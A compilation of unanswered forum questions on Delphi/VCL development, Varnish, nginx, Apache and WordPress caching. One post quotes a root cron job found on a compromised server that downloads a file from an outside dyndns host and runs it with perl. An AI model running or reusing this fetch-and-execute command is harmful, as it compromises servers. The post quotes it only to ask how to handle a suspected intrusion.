  • Minimum set of Delphi 2010 files to move to a SVN repository for compiling

    We are using Subversion for SCC. We have a great deal of our build environment in our repository so that we can check a given version out and rebuild it fairly close to what was in use at that time. We have the following in there now: InnoSetup binaries Third Party Components VCL (including Indy) Our Source (of course) Finalbuilder project files The only thing missing is the binaries for Delphi itself - I am wondering if there is a minimum set of files that can be copied to the repository and run.     Has anyone run into issues serializing components into a file and reading them back, specifically in the area where the component vendor upgrades the VCL components. For example a file serialized with DelphiX and then years later read back with delphiY. Do the serialization formats change and if so what can be done to prevent errors reading in the componets when upgrading.

    I am playing with DxScene and VxScene: http://www.ksdev.com/dxscene/index.html It looks very nice and powerful: 3d accelerated vector graphics, cross plaform, nice effects, many 2d GUI controls (vector based), good scaling, transparency, rotating (x, y, z), 3d models, etc. Even with many effects, the CPU stays very low (0%)! http://www.ksdev.com/dxscene/snapshot/screen0.jpeg But can it be seen as a good WPF alternative for Delphi? And does anyone use it instead of normal Delphi VCL?

    You can publish the properties of an control that is inside a activex form? example I have a form with an TAdoconnection component, I wish the properties of this component can be modified by the user when he loads my activex control. UPDATE @TOndrej gives me a very nice sample, but this sample only works for components derived from an activex control, how can accomplish this same efffect with an VCL component like an Timage or TMemo? is possible publish all the properties without rewrite each property to expose manually?

    Unit files for standard VCL files like Dialogs, StringUtils etc is never referenced in a projects DPR-file. But when should I add a reference to the DPR-file ? Now I have own sourcefiles and source of own components. What about source files for Ravereport, Devexpress, Indy, Gnostice etc ? I want as fast codeinsight as possible, but of course I do not want to add bloat to the DPR-file. I use Delphi 2007 Regards

  • Using ActiveRecord caching library in Heroku

    Hi all, I'm studying how to use caching in Heroku for my Rails app. HTTP cache powered by Varnish is superb and I'll use it in all pages without user info but I also want to use a kind of ActiveRecord caching with Memcached using "high livel" plugins such as cache_fu or cache-money...but it seems that Heroku supports only the memcached gem (http://docs.heroku.com/memcache) and it's a very low level Memcachad API... Do you have any other solutions? Thx.

    I'm writing a multi-threaded application in Delphi and need to use something to protect shared resources. In C# I'd use the "lock" keyword: private someMethod() { lock(mySharedObj) { //...do something with mySharedObj } } In Delphi I couldn't find anything similar, I found just TThread.Synchronize(someMethod) method, which prevents potential conflicts by calling someMethod in main VCL thread, but it isn't exactly what I want to do....   • Is it possible to use components derived from TWinControl in a service?

    I am creating a Delphi service. Is there any way to use controls derived from TWinControl within services? Ultimately the control and any controls I place on it will be saved to a bitmap. But anything I try I get "control has no parent window" error. I have successfully created a TBitMap and can accomplish the same functionality. But having all the functionality built into the VCL would greatly simplify the task.

  • High apache load but little traffic logged

    I recently installed Varnish to sit in front of Apache on a dedicated server running a single site. It appears to be working well, but the load on Apache is still very high. What doesn't make sense is that the Apache access log shows almost no traffic getting past Varnish. When I tail the apache log I see about 1-3 hits per second come through. I also posted ipconntrack suddenly became toooo large which has another data point I found unusual, wondering if the two things is connected as they occured exactly at the same time but at different servers.     We need to build a new web server for our organization. We have around 100 hundred small traffic web sites, so our hardware requirements are not too tough. We run CentOS 6, Varnish+Apache, PHP, MySQL, Typo3 CMS for most of websites. Here's a hardware we want to buy: SuperMicro X9SCA-F-O (we need to have a remote management capability) (or better X9SCM-F?) Intel Xeon E3-1220 v2 2*4Gb DDR-III 1600MHz Kingston ECC (KVR16E11/4) (currently we have 4gb, and it feels like enough, so no reason for 16gb yet). Procase EB140-B-0 (1 unit) PSU 350W Procase MG1350, Active PFC We already have: Intel 335 120GB SSD (for OS, databases and important websites). 2*2tb WD Green RAID1 (for other data and backups). Does it look like a reasonable choice for our needs? Any issues with hardware compatibility? Any other notes?

  • Monitoring outgoing bandwidth of application

    I currently have a VPS that is consuming a ton of outgoing bandwidth and I am trying to drill down to where this may be coming from. Does anyone know of a logical way to go about finding out which pages on the site are consuming the most outgoing data. We have done a ton of front-end optimizations to the site and our google page speed rankings ar 85% so I feel we have done a pretty great job at optimizing the site for speed. Can someone lend some insight on how they have made similar optimizations? Application / Server Stack LEMP Running Varnish Cache / PHP5-FPM WordPress running w3 Total Cache Ubuntu 12.04 LTS

  • W3 Total Cache or WP Super Cache?

    I'm just preparing the setup of a new VPS where I will migrate a WordPress blog with a good traffic (currently, around 40k pageviews a day), and I was thinking about the caching strategy. I've found different ideas and recommendations, but from previous experiences I will setup a Nginx+PHP-FPM+MySQL (LEMP) system on a Linode VPS. I've read also about setting Nginx as a reverse proxy with Apache, and even using Varnish too, but I don't know if all of this can benefit the speed/performance of the blog (that's the only thing that will be installed on the VPS). The question now is... would you recommend W3 Total Cache or WP Super Cache? I've used W3 on some blogs, but I haven't noticed great benefits and don't need all its options, so I think I could give the veteran WP Super Cache a try. Besides, some users have complained about W3 complex configuration and lack of performance (even consumig more CPU) on some cases.

  • Suspect cron job Centos 6.5 + Virtualmin, Recommended course of action?

    I was doing some routine maintenance on my server and noticed a new cron job. It is set to run every 5 minutes as root: cd /tmp;wget http://eventuallydown.dyndns.biz/abc.txt;curl -O http://eventuallydown.dyndns.biz/abc.txt;perl abc.txt;rm -f abc* I've tried to download the file, but there is nothing to download. The server is running normally and there are no strange signs that the box has been compromised other than this entry. The only thing I can think of is I recently installed Varnish Cache following this tutorial. Given that I did not enter the cron job and that there appears to be nothing wrong, besides disabling that cron job what would be the appropriate course of action from this point?

  • How to configure nginx to serve static contents from RAM?

    I want to set up nginx as my web server. I want to have image files cached in the memory (RAM) rather then disk. I am serving a small page and want few images always served from RAM. I dont wish to use varnish (or any other such tools) for this as I believe nginx has a capability to cache contents into RAM. I am not sure as how may I configure nginx for this? I did try few combinations but they didn't work. nginx uses disk all the time to get images. For example, when I tried apache benchmark to test with following command - ab -c 500 -n 1000 http://localhost/banner.jpg I get following error - socket: Too many open files (24) I guess this means nginx is trying to open to many files simultaneously from the disk and OS is not allowing this operation. Can anyone please suggest me a correct configuration? Thanks for considering this message.

It doesn't have long running background processes which it forks at the beginning and talks to later on, nor does it have long running queries or kept alive connection requirements. It receives a request, makes some queries to the database and then responds. In order to serve static files and cachable files fast, I am going to use Varnish in all cases. Here is my question: After reading about various Python web application servers, I have seen that they all have their "fans" for certain, usually "personal" reasons, which got me confused since each usecase differs from the next. How can I learn about the core differentiating factors of Python web servers (in order) to decide how suitable they are for my project and if one would be better than the other? What are your (technically provable) thoughts on the matter? How should I choose a Python web server? Thank you.

    Since Apache 2.4 I've started using mod_remoteip instead of mod_extract_forwarded for rewriting client address from x-forwarded-for provided by frontend servers (varnish, squid, apache etc). So far everything works fine with the modules, i.e. php, cgi, wsgi etc... - client addresses are shown as they should be, but I couldn't write client address in access logs (%a, %h, %{c}a). No luck - I'm always getting 127.0.0.1 (localhost forward ex.). How to log client's ip address when using mod_remoteip?

    when the traffic for a website grows i dont think one apache server in a vps is the way to go. i would like to know more about how i then should set up the server side architecture. im not that much into hardware stuff (what kind of cables to use, different cpu architectures etc), but interested in the software architecture: what servers (apache, nginx, squid, varnish etc) to use and how they interact with each other one server in one machine? how many mysql servers. how many apache, nginx servers and so on. how the "machine court" looks like. are there any good books about this area?

  • Asking for brief explanation of reverse proxying and recommended software

    I need to set up a reverse proxy where the backend web server is serving https pages only. I've never set up a reverse proxy and would like a brief overview of how it works. One of my questions is whether the proxy needs to run https also, or does simple http suffice? Second question would be whether to use Apache, varnish, nginx, or squid. This is for an internal site for a small company, so not a lot of traffic expected. Maybe a few dozen users each day.

    I've been working with linux for a while but in a rather simple manner. I understand that scripts in init.d are executed when the os starts but how exactly does it works? What if I want to keep a script but don't want it to start automaticly? Say I have a /etc/init.d/varnish and want to disable it temporary. How do I make sure it doesn't start if the os reboots? I don't want to delete the script. What if I want to add it again?
